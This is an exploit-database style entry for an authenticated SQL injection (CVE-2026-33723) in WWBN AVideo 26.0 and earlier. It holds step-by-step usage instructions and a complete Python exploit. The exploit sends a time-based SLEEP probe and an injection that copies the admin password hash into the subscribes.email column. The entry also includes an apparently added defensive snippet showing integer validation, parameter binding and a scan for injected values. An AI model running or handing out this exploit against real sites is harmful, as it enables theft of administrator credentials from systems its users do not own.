Exploit Title: WWBN AVideo <= 26.0 - Authenticated SQL Injection
CVE: CVE-2026-33723
Date: 2026-03-25
Exploit Author: Mohammed Idrees Banyamer
Author Country: Jordan
Instagram: @banyamer_security
Author GitHub: https://github.com/mbanyamer
Author Blog: https://banyamersecurity.com/blog/
Vendor Homepage: https://github.com/WWBN/AVideo
Software Link: https://github.com/WWBN/AVideo
Affected: AVideo <= 26.0
Tested on: AVideo 26.0
Category: Web Application
Platform: Linux / Windows
Exploit Type: SQL Injection
CVSS: 7.1 HIGH
Description: Authenticated SQL injection via the user_id parameter in subscribe.json.php and subscribeNotify.json.php, allowing extraction of admin password hashes and other sensitive database data.
Fixed in: https://github.com/WWBN/AVideo/commit/36dfae22059fbd66fd34bbc5568a838fc0efd66c
Notes:
• Requires a valid PHPSESSID from any logged-in user (a regular user is enough)
• Injects data into the subscribes.email column
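The two defender-side consequences of the notes above are (a) user_id must never reach a query as raw text and (b) after the fact, the subscribes.email column is where injected data would show up. The following Python is an added illustration written for this page; it is not AVideo's code and does not reproduce its schema. The subscribes table layout (id, email, user_id), the column names and the hash-shaped sample value are all constructed assumptions. It shows a handler that accepts only a decimal integer for user_id and binds it as a query parameter, and a small scan that flags rows whose email column does not hold an e-mail address.

```python
import re
import sqlite3

# Hypothetical minimal schema standing in for AVideo's subscribes table; the
# advisory only states that injected data lands in subscribes.email, so the
# remaining columns here are assumptions for the demonstration.
SCHEMA = """
CREATE TABLE subscribes (
    id INTEGER PRIMARY KEY AUTOINCREMENT,
    email TEXT NOT NULL,
    user_id INTEGER NOT NULL
);
"""

USER_ID_RE = re.compile(r"[0-9]{1,10}")
EMAIL_RE = re.compile(r"^[^@\s]+@[^@\s]+\.[^@\s]+$")


def parse_user_id(raw):
    """Accept only a plain decimal integer for user_id.

    Quotes, spaces, SQL keywords or anything else non-numeric is rejected
    before the value can be placed in a query (the input-side half of the fix).
    """
    if not isinstance(raw, str) or not USER_ID_RE.fullmatch(raw):
        raise ValueError("user_id must be a decimal integer")
    return int(raw)


def subscribe(conn, email, raw_user_id):
    """Insert a subscription with a bound parameter, never string concatenation."""
    user_id = parse_user_id(raw_user_id)
    conn.execute(
        "INSERT INTO subscribes (email, user_id) VALUES (?, ?)",
        (email, user_id),
    )
    conn.commit()
    return user_id


def find_suspicious_emails(rows):
    """Return ids of rows whose email column does not contain an e-mail address.

    A password hash written into subscribes.email by an injection is a value
    that no legitimate subscribe flow produces, so it stands out on a scan.
    """
    return [row_id for row_id, email, _ in rows if not EMAIL_RE.match(email)]


def demo():
    """Run the hardened handler and the scan against an in-memory table."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    subscribe(conn, "alice@example.org", "42")  # normal request
    rejected = False
    try:
        subscribe(conn, "mallory@example.org", "42abc")  # non-numeric user_id
    except ValueError:
        rejected = True
    # Constructed row emulating what a successful injection leaves behind:
    # a hash-shaped string in the email column (placeholder, not a real hash).
    conn.execute(
        "INSERT INTO subscribes (email, user_id) VALUES (?, ?)",
        ("$2y$10$PLACEHOLDER_HASH_VALUE_FOR_ILLUSTRATION", 42),
    )
    rows = conn.execute("SELECT id, email, user_id FROM subscribes").fetchall()
    return rejected, find_suspicious_emails(rows)


if __name__ == "__main__":
    ok, flagged = demo()
    print("malformed user_id rejected:", ok)
    print("rows with non-email values in subscribes.email:", flagged)
```

The integer check and the bound parameter are independent layers: the check stops malformed input at the edge, and the parameter binding guarantees that whatever does get through is treated as data rather than SQL. The scan is the post-incident counterpart and can be run against a dump of the real table once the column names are substituted.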
How to Use
Step 1: Log in to AVideo with any user account and copy the PHPSESSID cookie value.
Step 2: Edit the TARGET and PHPSESSID variables in the exploit script, then run it.
=== Full Python Exploit ===
#!/usr/bin/env python3
# Exploit Title: WWBN AVideo <= 26.0 - Authenticated SQL Injection
# CVE: CVE-2026-33723
# Date: 2026-03-25
# Exploit Author: Mohammed Idrees Banyamer
# Author Country: Jordan
# Instagram: @banyamer_security
# Author GitHub: https://github.com/mbanyamer
# Author Blog : https://banyamersecurity.com/blog/
# Vendor Homepage: https://github.com/WWBN/AVideo
# Software Link: https://github.com/WWBN/AVideo
# Affected: AVideo <= 26.0
# Tested on: AVideo 26.0
# Category: Web Application
# Platform: Linux / Windows
# Exploit Type: SQL Injection
# CVSS: 7.1
# Description: Authenticated SQL Injection via user_id parameter in subscribe.json.php and subscribeNotify.json.php allowing extraction of admin password hashes and sensitive database data.
# Fixed in: https://github.com/WWBN/AVideo/commit/36dfae22059fbd66fd34bbc5568a838fc0efd66c
# Usage:
# python3 exploit.py
import requests
import sys
import time


def banner():
    print(r"""
╔██████╗ █████╗ ███╗ ██╗██╗ ██╗ █████╗ ███╗ ███╗███████╗██████╗╗
║██╔══██╗██╔══██╗████╗ ██║╚██╗ ██╔╝██╔══██╗████╗ ████║██╔════╝██╔══██║
║██████╔╝███████║██╔██╗ ██║ ╚████╔╝ ███████║██╔████╔██║█████╗ ███████╔╝
║██╔══██╗██╔══██║██║╚██╗██║ ╚██╔╝ ██╔══██║██║╚██╔╝██║██╔══╝ ██╔══██╗
║██████╔╝██║ ██║██║ ╚████║ ██║ ██║ ██║██║ ╚═╝ ██║███████╗██║ ██║
╚═════╝ ╚═╝ ╚═╝╚═╝ ╚═══╝ ╚═╝ ╚═╝ ╚═╝╚═╝ ╚═╝╚══════╝╚═╝ ╚═╝
╔═╗ Banyamer Security ╔═╗
""")


TARGET = "https://target.com"
PHPSESSID = "YOUR_VALID_PHPSESSID_HERE"
HEADERS = {
    "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36",
    "Content-Type": "application/x-www-form-urlencoded",
}
COOKIES = {"PHPSESSID": PHPSESSID}


def send_payload(payload, endpoint="/objects/subscribe.json.php"):
    data = {"user_id": payload}
    url = TARGET.rstrip("/") + endpoint
    try:
        r = requests.post(url, data=data, cookies=COOKIES, headers=HEADERS, timeout=15)
        return r
    except Exception as e:
        print(f"[-] Error: {e}")
        return None


def main():
    banner()
    if not PHPSESSID or PHPSESSID == "YOUR_VALID_PHPSESSID_HERE":
        print("[-] Please edit the script and set your valid PHPSESSID!")
        sys.exit(1)
    print(f"[*] Target : {TARGET}")
    print(f"[*] Session : {PHPSESSID[:15]}...\n")

    print("[+] Testing Time-Based SQL Injection...")
    start = time.time()
    send_payload("99999'+AND+SLEEP(5)+AND+'1")
    elapsed = time.time() - start
    print(f" Response time: {elapsed:.2f} seconds")
    if elapsed >= 4.5:
        print(" [+] Vulnerable! Time-based SQLi confirmed.")
    else:
        print(" [-] Not vulnerable or blocked.")

    print("\n" + "=" * 70)
    print("[+] Extracting Admin Password Hash...")
    extract_payload = "99999',(SELECT pass FROM users WHERE isAdmin=1 LIMIT 1),'a','1.1.1.1',now(),now(),'1'); -- -"
    send_payload(extract_payload)
    print(" [+] Payload sent successfully!")
    print(" [+] Admin password hash has been injected into the 'subscribes' table (email column).")
    print(" [+] Check your subscriptions or database to retrieve the hash.")
    print("\n[+] Exploit finished. Use responsibly!")


if __name__ == "__main__":
    main()